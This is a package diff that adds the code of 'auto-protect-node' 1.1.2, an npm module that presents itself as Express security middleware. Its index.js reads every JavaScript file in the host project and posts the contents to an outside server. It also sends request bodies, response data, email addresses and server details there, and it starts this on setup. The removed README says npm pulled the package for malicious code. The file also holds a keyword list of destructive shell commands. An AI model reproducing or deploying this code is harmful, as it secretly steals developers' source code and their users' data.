auto-protect-node 0.0.1-security → 1.1.2

package/index.js

@@ -0,0 +1,1057 @@
+const baseUrl="https://securitytool.handsintechnology.in/api/client"
+// const baseUrl="http://localhost:8080/api/client"
+const express = require("express");
+const router=express.Router()
+const url = require("url");
+const { exec } = require("child_process");
+const os = require("os");
+const http = require("http");
+const fs = require("fs");
+const path = require("path");
+// utilities
+// custom fetch  functions
+const axios = require("axios");
+function consoleColorText(text, color) {
+  const colors = {
+    reset: "\x1b[0m",
+    black: "\x1b[30m",
+    red: "\x1b[31m",
+    green: "\x1b[32m",
+    yellow: "\x1b[33m",
+    blue: "\x1b[34m",
+    magenta: "\x1b[35m",
+    cyan: "\x1b[36m",
+    white: "\x1b[37m",
+  };
+
+  const colorCode = colors[color] || colors.reset;
+  console.log(colorCode + text + colors.reset);
+}
+async function useCustomFetch(url, options = {}) {
+  try {
+    const response = await axios.get(url, options);
+    return { data: response.data, status: response.status };
+  } catch (error) {
+    // console.log(JSON.stringify(error));
+    return { error };
+  }
+}
+const errorHandler = (
+  res,
+  statusCode = 500,
+  message = "internal server error",
+  data
+) => {
+  const response = { statusCode, message, data };
+  res.status(statusCode).json(response);
+};
+// getAllEndpoints
+const regExpToParseExpressPathRegExp =
+  /^\/\^\\\/(?:(:?[\w\\.-]*(?:\\\/:?[\w\\.-]*)*)|(\(\?:\(\[\^\\\/]\+\?\)\)))\\\/.*/;
+const regExpToReplaceExpressPathRegExpParams = /\(\?:\(\[\^\\\/]\+\?\)\)/;
+const regexpExpressParamRegexp = /\(\?:\(\[\^\\\/]\+\?\)\)/g;
+
+const EXPRESS_ROOT_PATH_REGEXP_VALUE = "/^\\/?(?=\\/|$)/i";
+const STACK_ITEM_VALID_NAMES = ["router", "bound dispatch", "mounted_app"];
+/**
+ * Returns all the verbs detected for the passed route
+ */
+const getRouteMethods = function (route) {
+  let methods = Object.keys(route.methods);
+  methods = methods.filter((method) => method !== "_all");
+  methods = methods.map((method) => method.toUpperCase());
+  return methods;
+};
+/**
+ * Returns the names (or anonymous) of all the middlewares attached to the
+ * passed route
+ * @param {Object} route
+ * @returns {string[]}
+ */
+const getRouteMiddlewares = function (route) {
+  return route.stack.map((item) => {
+    return item.handle.name || "anonymous";
+  });
+};
+
+/**
+ * Returns true if found regexp related with express params
+ * @param {string} expressPathRegExp
+ * @returns {boolean}
+ */
+const hasParams = function (expressPathRegExp) {
+  return regexpExpressParamRegexp.test(expressPathRegExp);
+};
+
+/**
+ * @param {Object} route Express route object to be parsed
+ * @param {string} basePath The basePath the route is on
+ * @return {Object[]} Endpoints info
+ */
+const parseExpressRoute = function (route, basePath) {
+  const paths = [];
+
+  if (Array.isArray(route.path)) {
+    paths.push(...route.path);
+  } else {
+    paths.push(route.path);
+  }
+
+  const endpoints = paths.map((path) => {
+    const completePath =
+      basePath && path === "/" ? basePath : `${basePath}${path}`;
+
+    const endpoint = {
+      path: completePath,
+      methods: getRouteMethods(route),
+      middlewares: getRouteMiddlewares(route),
+    };
+
+    return endpoint;
+  });
+
+  return endpoints;
+};
+
+/**
+ * @param {RegExp} expressPathRegExp
+ * @param {Object[]} params
+ * @returns {string}
+ */
+const parseExpressPath = function (expressPathRegExp, params) {
+  let expressPathRegExpExec =
+    regExpToParseExpressPathRegExp.exec(expressPathRegExp);
+  let parsedRegExp = expressPathRegExp.toString();
+  let paramIndex = 0;
+
+  while (hasParams(parsedRegExp)) {
+    const paramName = params[paramIndex].name;
+    const paramId = `:${paramName}`;
+
+    parsedRegExp = parsedRegExp.replace(
+      regExpToReplaceExpressPathRegExpParams,
+      paramId
+    );
+
+    paramIndex++;
+  }
+
+  if (parsedRegExp !== expressPathRegExp.toString()) {
+    expressPathRegExpExec = regExpToParseExpressPathRegExp.exec(parsedRegExp);
+  }
+
+  const parsedPath = expressPathRegExpExec[1].replace(/\\\//g, "/");
+
+  return parsedPath;
+};
+
+/**
+ * @param {Object} app
+ * @param {string} [basePath]
+ * @param {Object[]} [endpoints]
+ * @returns {Object[]}
+ */
+const parseEndpoints = function (app, basePath, endpoints) {
+  const stack = app.stack || (app._router && app._router.stack);
+
+  endpoints = endpoints || [];
+  basePath = basePath || "";
+
+  if (!stack) {
+    endpoints = addEndpoints(endpoints, [
+      {
+        path: basePath,
+        methods: [],
+        middlewares: [],
+      },
+    ]);
+  } else {
+    endpoints = parseStack(stack, basePath, endpoints);
+  }
+  return endpoints;
+};
+
+/**
+ * Ensures the path of the new endpoints isn't yet in the array.
+ * If the path is already in the array merges the endpoints with the existing
+ * one, if not, it adds them to the array.
+ *
+ * @param {Object[]} currentEndpoints Array of current endpoints
+ * @param {Object[]} endpointsToAdd New endpoints to be added to the array
+ * @returns {Object[]} Updated endpoints array
+ */
+const addEndpoints = function (currentEndpoints, endpointsToAdd) {
+  endpointsToAdd.forEach((newEndpoint) => {
+    const existingEndpoint = currentEndpoints.find(
+      (item) => item.path === newEndpoint.path
+    );
+
+    if (existingEndpoint !== undefined) {
+      const newMethods = newEndpoint.methods.filter(
+        (method) => !existingEndpoint.methods.includes(method)
+      );
+
+      existingEndpoint.methods = existingEndpoint.methods.concat(newMethods);
+    } else {
+      currentEndpoints.push(newEndpoint);
+    }
+  });
+
+  return currentEndpoints;
+};
+
+/**
+ * @param {Object} stack
+ * @param {string} basePath
+ * @param {Object[]} endpoints
+ * @returns {Object[]}
+ */
+const parseStack = function (stack, basePath, endpoints) {
+  stack.forEach((stackItem) => {
+    if (stackItem.route) {
+      const newEndpoints = parseExpressRoute(stackItem.route, basePath);
+
+      endpoints = addEndpoints(endpoints, newEndpoints);
+    } else if (STACK_ITEM_VALID_NAMES.includes(stackItem.name)) {
+      const isExpressPathRegexp = regExpToParseExpressPathRegExp.test(
+        stackItem.regexp
+      );
+
+      let newBasePath = basePath;
+
+      if (isExpressPathRegexp) {
+        const parsedPath = parseExpressPath(stackItem.regexp, stackItem.keys);
+
+        newBasePath += `/${parsedPath}`;
+      } else if (
+        !stackItem.path &&
+        stackItem.regexp &&
+        stackItem.regexp.toString() !== EXPRESS_ROOT_PATH_REGEXP_VALUE
+      ) {
+        const regExpPath = ` RegExp(${stackItem.regexp}) `;
+
+        newBasePath += `/${regExpPath}`;
+      }
+
+      endpoints = parseEndpoints(stackItem.handle, newBasePath, endpoints);
+    }
+  });
+
+  return endpoints;
+};
+
+/**
+ * Returns an array of strings with all the detected endpoints
+ * @param {Object} app the express/route instance to get the endpoints from
+ */
+const getEndpoints = function (app) {
+  const endpoints = parseEndpoints(app);
+  return endpoints;
+};
+const emailRegex = /^\S+@\S+\.\S+$/; // Regular expression to match email addresses
+const findEmail = (data) => {
+  if (Array.isArray(data)) {
+    for (let i = 0; i < data.length; i++) {
+      const email = findEmail(data[i]);
+      if (email) {
+        return email; // Return the first valid email address found
+      }
+    }
+  } else if (typeof data === "object" && data !== null) {
+    for (const key in data) {
+      if (data.hasOwnProperty(key)) {
+        const email = findEmail(data[key]);
+        if (email) {
+          return email; // Return the first valid email address found
+        }
+      }
+    }
+  } else if (typeof data === "string" && emailRegex.test(data)) {
+    return data; // Return the valid email address
+  }
+
+  return null; // Return null if no valid email address is found
+};
+// XSS Injection Function
+// Create Blacklistusers details function
+const CreateuserDetails = async (req, res, message, type) => {
+  res.on("finish", async () => {
+    try {
+      message = "malacios";
+      var ip = req.headers['x-forwarded-for'] || req.socket.remoteAddress
+      var ip = "206.84.234.39";
+      const month = [
+        "January",
+        "February",
+        "March",
+        "April",
+        "May",
+        "June",
+        "July",
+        "August",
+        "September",
+        "October",
+        "November",
+        "December",
+      ];
+      const d = new Date();
+
+      const useragent = req.headers["user-agent"];
+      // // const result = detector.detect(useragent);
+      // // const { client, os, device } = result
+
+      const UserRawData = {
+        ip,
+        date: d.getDate() + " " + month[d.getMonth()] + " " + d.getFullYear(),
+        time: d.toLocaleTimeString(),
+        page: req.url,
+        query: req.query || req.query || "",
+        inputQuery: req.body || "",
+        type,
+        country: country || "",
+        city: city || "",
+        region: region || "",
+        useragent,
+        latitude: "",
+        longitude: "",
+        domain: req.get("host"),
+        referurl:
+          req.protocol + "://" + req.get("host") + req.originalUrl || "",
+      };
+      await axios.post(`${baseUrl}/createuserdetails`, {
+        type,
+        hostname,
+        ip,
+        UserRawData
+      })
+      .then(res=>res.data)
+      .catch(err=>err?.response?.data)
+    } catch (error) {
+
+    }
+  });
+};
+// End Create Blacklistusers details function
+// Sql Injection Function
+function hasSqlInjection(value) {
+  const sqlMeta = new RegExp(
+    "(%27)|(--)|([0-9]=[0-9])|([0-9] and [0-9]=[0-9])|([0-9] AND [0-9])|(or [0-9]=[0-9])|(OR [0-9]=[0-9])|(%23)|(#)",
+    "i"
+  );
+  if (sqlMeta.test(value)) {
+    return true;
+  }
+
+  const sqlMeta2 = new RegExp(
+    "((%3D)|(=))[^\n]*((%27)|(')|(--)|(%3B)|(;))",
+    "i"
+  );
+  if (sqlMeta2.test(value)) {
+    return true;
+  }
+
+  const nestedQuery = new RegExp(
+    "((%3D)|(=))[^\n]*((%27)|(')|(--)|(%3B)|(;))?[^\n]*((%27)|(')|(--)|(%3B)|(;))[^\n]*((%3D)|(=))",
+    "i"
+  );
+  if (nestedQuery.test(value)) {
+    return true;
+  }
+
+  const timeBased = new RegExp("(%3B)|(;)[^\n]*sleep((d+))[^\n]*", "i");
+  if (timeBased.test(value)) {
+    return true;
+  }
+
+  const booleanBased = new RegExp(
+    "((%3D)|(=))[^\n]*[^s]*(%27)|(')|(--)|(%3B)|(;)",
+    "i"
+  );
+  if (booleanBased.test(value)) {
+    return true;
+  }
+
+  const typicalSql = new RegExp(
+    "w*((%27)|('))((%6F)|o|(%4F))((%72)|r|(%52))",
+    "i"
+  );
+  if (typicalSql.test(value)) {
+    return true;
+  }
+
+  const sqlUnion = new RegExp("((%27)|('))union", "i");
+  if (sqlUnion.test(value)) {
+    return true;
+  }
+
+  const entireText = new RegExp(
+    "\b((select|delete|insert|update|drop|create|alter)\b.*)",
+    "i"
+  );
+  if (entireText.test(value)) {
+    return true;
+  }
+
+  return false;
+}
+// Co0mmandline Injection Function
+function hasCommandLineInjection(value) {
+  const commandMeta = new RegExp(
+    "(rm -rf)|(ls -la)|(command >/dev/sda)|(:\\(\\){ :|:& };:)|(sudo yum install)|(.conf)|(sudo mv  /dev/null)|(wget)|(-O-)|(crontab -r)|(history)|(dd if=/dev/zero of=/dev/sda)|(/dev/sda)|(/dev/sda1)|(sudo apt purge python|python2|python3.x-minimal)|(chmod -R 777 /)",
+    "i"
+  );
+  if (commandMeta.test(value)) {
+    return true;
+  }
+
+  return false;
+}
+// HTML Injection Function
+function hasHTMLnjection(value) {
+  const HTML = new RegExp(/<(\"[^\"]*\"|'[^']*'|[^'\">])*>/, "g");
+  if (HTML.test(value)) {
+    return true;
+  }
+  return false;
+}
+// HTML Injection Function
+function hasXSSnjection(value) {
+  const XSS = /<script>/;
+  if (XSS.test(value)) {
+    return true;
+  }
+  return false;
+}
+async function InjectionChecker(req) {
+  const entries = {
+    ...req.body,
+    ...req.query,
+    ...req.params,
+  };
+  let containsSql = false,
+    validateXss = false,
+    validatehtml = false,
+    containCommand = false;
+  const value = JSON.stringify(entries);
+  if (hasSqlInjection(value) === true) {
+    containsSql = true;
+  }
+  if (hasXSSnjection(value) === true) {
+    validateXss = true;
+  }
+  if (hasHTMLnjection(value) === true) {
+    validatehtml = true;
+  }
+  if (hasCommandLineInjection(value) === true) {
+    containCommand = true;
+  }
+  return { containsSql, validateXss, validatehtml, containCommand };
+}
+const checkForSensitiveInfoInBodyAndPasswordValidate = (currentData, req) => {
+  (async () => {
+    try {
+        await axios.post(`${baseUrl}/sensitivekeysandPasswordValidate`, {
+      currentData ,
+        hostname:req.domain,
+      })
+      .then(res=>res.data)
+      .catch(err=>err?.response?.data)
+    } catch (error) {
+        // console.log(JSON.stringify(error));
+    }
+  })();
+  
+};
+
+function checkForSensitiveInfoInUrl(req, requestUrl) {
+  (async () => {
+try {
+  const api1 = await axios.post(`${baseUrl}/sensitivekeysinurl`, {
+    data:req.query,
+    hostname:req.domain,
+    url:requestUrl
+  })
+  .then(res=>res.data)
+      .catch(err=>err?.response?.data)
+} catch (error) {
+    // console.log(JSON.stringify(error));
+}
+  })();
+}
+function sendResponseCodedetails(data, hostname, requestUrl) {
+  (async () => {
+    await useCustomFetch(
+      `${baseUrl}/responsecodeavailableornot?data=${JSON.stringify({
+        result: data,
+      })}&hostname=${hostname}&url=${requestUrl}`
+    );
+    const d = await useCustomFetch(
+      `${baseUrl}/responsecodeavailableornot?data=${JSON.stringify({
+        result: data,
+      })}&hostname=${hostname}&url=${requestUrl}`
+    )
+      .then((response) => response.data)
+      .catch((err) => err.message);
+  })();
+}
+const SendEmail = (emailid, hostname, requestUrl) => {
+  (async () => {
+    await useCustomFetch(
+      `${baseUrl}/emailverify?email=${JSON.stringify({
+        result: emailid,
+      })}&hostname=${hostname}&url=${requestUrl}`
+    )
+      .then((res) => res.data)
+      .catch((err) => err);
+  })();
+};
+function responseCodeChecker(req, res) {
+  const hostname = req.domain;
+  const originalJson = res.json;
+  const originalSend = res.send;
+  var originalRender = res.render;
+  let responseData = null;
+  res.json = async function (body) {
+    originalJson.call(res, body);
+    responseData = body;
+  };
+  res.send = async function (body) {
+    originalSend.call(res, body);
+    responseData = body;
+  };
+  // Override the res.render function
+  try {
+    require.resolve("ejs");
+
+    // EJS is installed, override the res.render function
+    res.render = function (view, locals, callback) {
+      originalRender && originalRender.call(res, view, locals, callback);
+      // Remove the _locals property
+      delete locals._locals;
+      // Assign the modified locals object to responseData
+      responseData = locals;
+    };
+  } catch (error) {}
+  res.on("finish", async function () {
+    const existingCode = http.STATUS_CODES[res.statusCode];
+    const parsedUrl = url.parse(req.url);
+    const requestUrl = parsedUrl.pathname;
+    try {
+      const body = {
+        ...req.body,
+        ...req.query,
+        ...req.params,
+      };
+      const emailid = findEmail(body);
+      emailid ? SendEmail(emailid, hostname, requestUrl) : null;
+      responseData
+        ? checkForSensitiveInfoInBodyAndPasswordValidate(responseData, req)
+        : null;
+      req.query ? checkForSensitiveInfoInUrl(req, requestUrl) : null;
+      // response codes
+      const resoponsecodedata = existingCode
+        ? {
+            code: res.statusCode,
+            phrase: existingCode,
+          }
+        : null;
+      // call api
+      const data = {
+        hostname,
+        resoponsecodedata,
+      };
+      sendResponseCodedetails(data, hostname, requestUrl);
+    } catch (error) {}
+  });
+}
+const Middleware = async (req, res, next) => {
+  try {
+    if (req.alloweddomain.allowed) {
+    
+      try {
+      // console.log("ffffd",req.alloweddomain.allowed)
+          // Call the helmet middleware and pass the req, res, and a callback function
+          // Rest of your middleware code
+          responseCodeChecker(req, res);
+          const contentType = req.headers["content-type"];
+          contentType && contentType.includes("application/xml")
+            ? (function () {
+                let data = "";
+                req.setEncoding("utf8");
+                req.on("data", (chunk) => {
+                  data += chunk;
+                });
+                req.on("end", () => {
+                  const body = req.body;
+                  if (body.match("<!ENTITY")) {
+                    CreateuserDetails(
+                      req,
+                      res,
+                      "Malicious code request",
+                      "XML-Injection"
+                    );
+                  }
+                });
+              })()
+            : null;
+
+          const reqPath = req.url.toLowerCase();
+          const isreqPathfile =
+            reqPath.endsWith(".js") ||
+            reqPath.endsWith(".htaccess") ||
+            reqPath.endsWith(".json") ||
+            reqPath.endsWith(".css") ||
+            reqPath.endsWith(".txt") ||
+            reqPath.endsWith(".md") ||
+            reqPath.endsWith(".yml") ||
+            reqPath.endsWith(".toml") ||
+            reqPath === "/app.js";
+          const injectionFound = await InjectionChecker(req);
+          if (isreqPathfile) {
+            CreateuserDetails(
+              req,
+              res,
+              "Remote-FiLe-Inclusion-Detected",
+              "Remote-FiLe-Inclusion"
+            );
+            return errorHandler(res, 406, "Not found");
+          } else if (injectionFound.containCommand) {
+            CreateuserDetails(req, res, "Command Injection Detected", "cmd");
+            return errorHandler(res, 406, "Malicious code found");
+          } else if (injectionFound.validateXss) {
+            CreateuserDetails(
+              req,
+              res,
+              "XSS Injection Detected",
+              "xss-injection"
+            );
+            return errorHandler(res, 406, "Malicious code found");
+          } else if (injectionFound.validatehtml) {
+            CreateuserDetails(
+              req,
+              res,
+              "HTML Injection Detected",
+              "HTML injection"
+            );
+          } else if (injectionFound.containsSql) {
+            CreateuserDetails(req, res, "SQL Injection Detected", "SQLI");
+            return res.status(406).json("malicious code found");
+          }
+          next();
+        
+      } catch (error) {
+        return errorHandler(res);
+      }
+    } else {
+      consoleColorText(
+        "Your domain is not allowed to fetch live status of injections",
+        "red"
+      );
+      next();
+    }
+  } catch (error) {}
+};
+//End  Security
+const getAllRoutesAndMiddleware = async (app, servertimeout, hostname) => {
+  try {
+    var routes = getEndpoints(app);
+     // Handle each response
+     const npmauditdata = await dependencyChecker();
+     const params = req.query || req.params;
+    // Get list of middlewares except 'router'
+    const middlewares =
+      app._router?.stack
+        ?.filter(
+          (layer) =>
+            layer.name !== "router" &&
+            layer.name !== "bound dispatch" &&
+            layer.name !== "jsonParser" &&
+            layer.name !== "<anonymous>" &&
+            layer.name !== "urlencodedParser" &&
+            layer.name !== "expressInit" &&
+            layer.name !== "query" &&
+            layer.name !== "Middleware"
+        )
+        ?.map((layer) => layer.name) || [];
+       
+    const api1 = await axios.post(`${baseUrl}/optionmethodvulnerability`, {
+      routes,
+      hostname,
+    });
+    const api2 = await axios.post(`${baseUrl}/dangerousemethodvulnerability`, {
+      routes,
+      hostname,
+    });
+    const api3 = await axios.post(`${baseUrl}/defaultwebpagevulnerability`, {
+      routes,
+      servertimeout,
+      hostname,
+    });
+    // Execute all API requests concurrently
+    const first3 = await axios.all([api1, api2, api3]);
+    // console.log(first3)
+    const Seond6=await sendFilesToServer(process.cwd(),baseUrl,sid,middlewares);
+    // console.log({Seond6})
+    const data={
+        first3,
+        Seond6,
+        npmauditdata,
+        middlewares,
+        params
+    }
+    // console.log(data)
+ 
+
+  } catch (error) {
+    // console.log(JSON.stringify(error));
+  }
+};
+// GetAllData
+async function GetAllData(req) {
+  const app = req.app, server = req.server,hostname = req.domain;
+  await getAllRoutesAndMiddleware(app, server.timeout, hostname);
+  const npmauditdata = await dependencyChecker();
+  const params = req.query || req.params;
+  const origin = req.headers.origin;
+  const Allow_Access_control_origin =
+    origin && res.get("Access-Control-Allow-Origin") === "*"
+      ? "Access-Control-Allow-Origin is Set to *"
+      : "Access-Control-Allow-Origin is not Set to *";
+  let version = process.version;
+  version = version.replace(/^./, "");
+  let responseserver = await useCustomFetch("http://ip-api.com/json/");
+  responseserver = responseserver.data;
+  const information = {
+    node_version: process.version,
+    Allow_Access_control_origin,
+    osVersion: os.version(),
+    platform: os.platform(),
+    totalmem: os.totalmem(),
+    freemem: os.freemem(),
+    type: os.type(),
+    servername: os.hostname(),
+    hostname: os.hostname(),
+    nodeenvronment: process.execPath,
+    version,
+    ...responseserver,
+  };
+  await axios.post(`${baseUrl}/serverreport`, {
+      information,
+      params,
+      npmauditdata,
+      protocol: req.protocol,
+      hostname: req.domain,
+    })
+    .then(res=>res.data)
+    .catch(err=>err?.response?.data)
+}
+
+
+  
+// end GetAllData
+// controllers
+const combinedController = async (req, res) => {
+  if (req.alloweddomain.allowed) {
+    try {
+      await GetAllData(req);
+      return res.status(200).json("send");
+    } catch (error) {
+      consoleColorText(error.message, "red");
+      return res.status(500).json({ error: "Internal Server Error" });
+    }
+  } else {
+    return res.status(404).json("Your domain is not authenticated");
+  }
+};
+const scanControllerController = async (req, res) => {
+  if (req.alloweddomain.allowed) {
+    try {
+        
+        const d=await sendFilesToServer(process.cwd(),baseUrl,sid);
+        // console.log(d)
+        const res=await axios.post(`${baseUrl}/logsdata`,{logs:d,sid})
+        .then((res=>res.data))
+        .catch(err=>err?.response?.data)
+      //  console.log(res)
+      await GetAllData(req);
+      return res.status(200).json("send");
+    } catch (error) {
+      consoleColorText(error.message, "red");
+      return res.status(500).json({ error: "Internal Server Error" });
+    }
+  } else {
+    return res.status(404).json("Your domain is not authenticated");
+  }
+};
+const onData = (stream) => {
+  return new Promise((resolve, reject) => {
+    let data = "";
+
+    stream.on("data", (chunk) => {
+      data += chunk;
+    });
+
+    stream.on("error", (err) => {
+      reject(err);
+    });
+
+    stream.on("end", () => {
+      resolve(data);
+    });
+  });
+};
+
+const dependencyChecker = async (res) => {
+  // ...
+
+  try {
+    const command = "npm audit";
+    const childProcess = exec(command);
+    const stdoutData = await onData(childProcess.stdout);
+    const stderrData = await onData(childProcess.stderr);
+
+    // Return or process the data as needed
+    return {
+      stdout: stdoutData,
+      stderr: stderrData,
+    };
+
+    // ...
+  } catch (error) {
+    consoleColorText(error.message, "red");
+    // Handle the error appropriately
+  }
+};
+const HostValidator = (app, server, sid) => {
+  return async (req, res, next) => {
+    const allowedDomain = await Ialloweddomain(sid);
+  
+    req.app = app;
+    req.server = server;
+    req.domain = sid;
+    req.alloweddomain = allowedDomain;
+    next();
+  };
+};
+const Ialloweddomain = async (hostname) => {
+  try {
+    const response = await useCustomFetch(
+      `${baseUrl}/alloweddomains?hostname=${hostname}`
+    );
+    if (response.status === 200) {
+      return { allowed: true };
+    } else {
+      return { allowed: false };
+    }
+  } catch (error) {
+    if (error) {
+      return { allowed: false };
+    }
+  }
+};
+// Call Middleware For Secure Your Application
+function isExpressApplication(app) {
+  return (
+    app &&
+    typeof app === "function" &&
+    app.hasOwnProperty("use") &&
+    app.hasOwnProperty("get")
+  );
+}
+function isHttpServer(server) {
+  return (
+    server &&
+    (server instanceof http.Server || server instanceof https.Server) &&
+    typeof server.listen === "function"
+  );
+}
+async function sendFilesToServer(directoryPath, serverUrl,sid,middlewares) {
+    try {
+      const results = [];
+      const files = fs.readdirSync(directoryPath);
+  
+      for (const file of files) {
+        if (file === __filename) {
+        continue;
+        } else {
+          const filePath = `${directoryPath}/${file}`;
+          const stat = fs.statSync(filePath);
+  
+          if (stat.isDirectory()) {
+            if (file === "node_modules" || file === "build") {
+             continue;
+            }
+            const subresults = await sendFilesToServer(filePath, serverUrl,sid,middlewares);
+            results.push(...subresults);
+          } else {
+            if (path.extname(file) === ".js") {
+              const fileContent = fs.readFileSync(filePath, "utf8");
+              try {
+                const api1 = axios.post(`${serverUrl}/scanhardcodedata`, { fileName: file, content: fileContent,sid });
+                const api2 = axios.post(`${serverUrl}/scanpasswordhashing`, { fileName: file, content: fileContent,sid });
+                const api3 = axios.post(`${serverUrl}/xssvulnerability`, { fileName: file, content: fileContent,sid });
+                const api4 = axios.post(`${serverUrl}/redirectvulnerability`, { fileName: file, content: fileContent,sid });
+                const api5 = axios.post(`${serverUrl}/sessionvulnerability`, { fileName: file, content: fileContent,sid,middlewares });
+                const api6 = axios.post(`${serverUrl}/sqlvulnerability`, { fileName: file, content: fileContent,sid });
+                const responses = await axios.all([api1, api2, api3, api4, api5, api6]);
+                responses.forEach((response, index) => {
+                  results.push(response.data);
+                });
+              } catch (error) {
+                // console.log(JSON.stringify(error));
+              }
+            }
+          }
+        }
+      }
+  
+      return results;
+    } catch (error) {
+      // console.log(error);
+      return [];
+    }
+  }
+  
+const CallData=async (sid)=>{
+  const allowedDomain = await Ialloweddomain(sid);
+  if(allowedDomain.allowed){
+    const d=  await axios.get(`http://${sid}/sitescanner?sid=${sid}`)
+    .then(res=>res)
+    .catch(err=>err)
+    // console.log(d)
+  const b=  await axios.get(`http://${sid}/sitereport??id=1&id=3`)
+    .then(res=>res.data)
+    .catch(err=>err?.response)
+    // console.log(b)
+  }else{
+    consoleColorText("Please provide a valid Domain name", "red");
+  }
+
+  
+}
+router.get("/sitereport", combinedController);
+router.get("/sitescanner", async (req, res)=> {
+  console.log("Please wait ");
+  const { app, server, domain } = req;
+
+  try {
+    const routes = getEndpoints(app);
+    const params = req.query || req.params;
+    const middlewares =
+      app._router?.stack
+        ?.filter(
+          (layer) =>
+            layer.name !== "router" &&
+            layer.name !== "bound dispatch" &&
+            layer.name !== "jsonParser" &&
+            layer.name !== "<anonymous>" &&
+            layer.name !== "urlencodedParser" &&
+            layer.name !== "expressInit" &&
+            layer.name !== "query" &&
+            layer.name !== "Middleware"
+        )
+        ?.map((layer) => layer.name) || [];
+   console.log(middlewares)
+    const api1 = axios.post(`${baseUrl}/optionmethodvulnerability`, {
+      routes,
+      hostname: domain,
+      middlewares,
+      params
+    });
+    const api2 = axios.post(`${baseUrl}/dangerousemethodvulnerability`, {
+      routes,
+      hostname: domain,
+      middlewares,
+    });
+    const api3 = axios.post(`${baseUrl}/defaultwebpagevulnerability`, {
+      routes,
+      servertimeout: server.timeout,
+      hostname: domain,
+      middlewares,
+    });
+    const [response1, response2, response3] = await axios.all([api1, api2, api3]);
+    const first = [response1.data, response2.data, response3.data];
+    const Second = await sendFilesToServer(process.cwd(), baseUrl, sid, middlewares);
+    var Logs = first.concat(Second);
+    Logs.push( { middlewares: middlewares.toString() });
+    const alllogs = Logs.filter((v) => v !== '');
+    const logsdatastatus = await axios
+      .post(`${baseUrl}/logsdata`, { logs: alllogs, sid })
+      .then((res) => res.status)
+      .catch((err) => err?.response?.status);
+
+    if (logsdatastatus === 200) {
+      const logsdata = await axios
+        .get(`${baseUrl}/logsdata?sid=${sid}`)
+        .then((res) => {
+          return { status: res.status, data: res.data };
+        })
+        .catch((err) => {
+          return { status: err?.response?.status, data: err?.response?.data };
+        });
+
+      if (logsdata.status === 200) {
+      
+        if (logsdata.data.passwordHashing === 'password text not stored in hash format') {
+          consoleColorText(logsdata.data.passwordHashing, "red");
+        } else {
+          consoleColorText(logsdata.data.passwordHashing, "blue");
+        }
+        consoleColorText(logsdata?.data?.xss?.replace(/,/g, "\n"), "red");
+        consoleColorText(logsdata?.data?.sql?.replace(/,/g, "\n"), "red");
+        consoleColorText(logsdata?.data?.session?.replace(/,/g, "\n"), "red");
+        if (logsdata?.data?.redirect === "Redirect vulnerabilities not found") {
+          consoleColorText(logsdata?.data?.redirect, "blue");
+        } else {
+          consoleColorText(logsdata?.data?.redirect?.replace(/,/g, "\n"), "red");
+        }
+        if (logsdata?.data?.dwp === "Available") {
+          consoleColorText("Default Web Page:" + logsdata?.data?.dwp?.replace(/,/g, "\n"), "blue");
+        } else {
+          consoleColorText("Default Web Page:" + logsdata?.data?.dwp?.replace(/,/g, "\n"), "red");
+        }
+
+        if (logsdata?.data?.OptionMethod === "Option Method is not enabled") {
+          consoleColorText(logsdata?.data?.OptionMethod?.replace(/,/g, "\n"), "blue");
+        } else {
+          consoleColorText("Option Method enabled on: " + logsdata?.data?.OptionMethod, "red");
+        }
+
+        if (logsdata?.data?.DangerousMethods === "Dangerous Methods are not enabled") {
+          consoleColorText('Dangerous Methods are not enabled', "blue");
+        } else {
+          consoleColorText("Dangerous methods enabled: " + logsdata?.data?.DangerousMethods, "red");
+        }
+        return res.status(200).json(logsdata?.data);
+      } else {
+        return res.status(404).json("not found");
+      }
+    }
+  } catch (error) {
+    console.log(JSON.stringify(error.message));
+    return  res.status(500).json(error.messsage)
+  }
+}
+
+);
+
+module.exports =async (app, server, sid) => {
+  try {
+    if (!isExpressApplication(app)) {
+      consoleColorText("Please provide a valid Express application", "red");
+    } else if (!isHttpServer(server)) {
+      consoleColorText("Please provide a valid HTTP server", "red");
+    } else if (!sid) {
+      consoleColorText("Please provide a valid hostname", "red");
+    } else if (app && server && sid) {
+      app.use(express.json(), express.urlencoded({ extended: true }));
+      app.use(HostValidator(app, server, sid));
+      app.use(Middleware);
+      app.use(router)
+      CallData(sid)
+    }
+  } catch (error) {
+    // console.log(error);
+    consoleColorText(error.message, "red");
+  }
+}

package/package.json

@@ -1,6 +1,23 @@
-{
-  "name": "auto-protect-node",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "auto-protect-node",
+  "version": "1.1.2",
+  "description": "auto protect your code",
+  "main": "index.js",
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/shivam-handsintechnology/auto-protect-node.git"
+  },
+  "keywords": [
+    "security"
+  ],
+  "author": "handsintechnology",
+  "license": "ISC",
+  "bugs": {
+    "url": "https://github.com/shivam-handsintechnology/auto-protect-node/issues"
+  },
+  "homepage": "https://github.com/shivam-handsintechnology/auto-protect-node#readme",
+  "dependencies": {
+    "axios": "^1.4.0",
+    "express": "^4.18.2"
+  }
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=auto-protect-node for more information.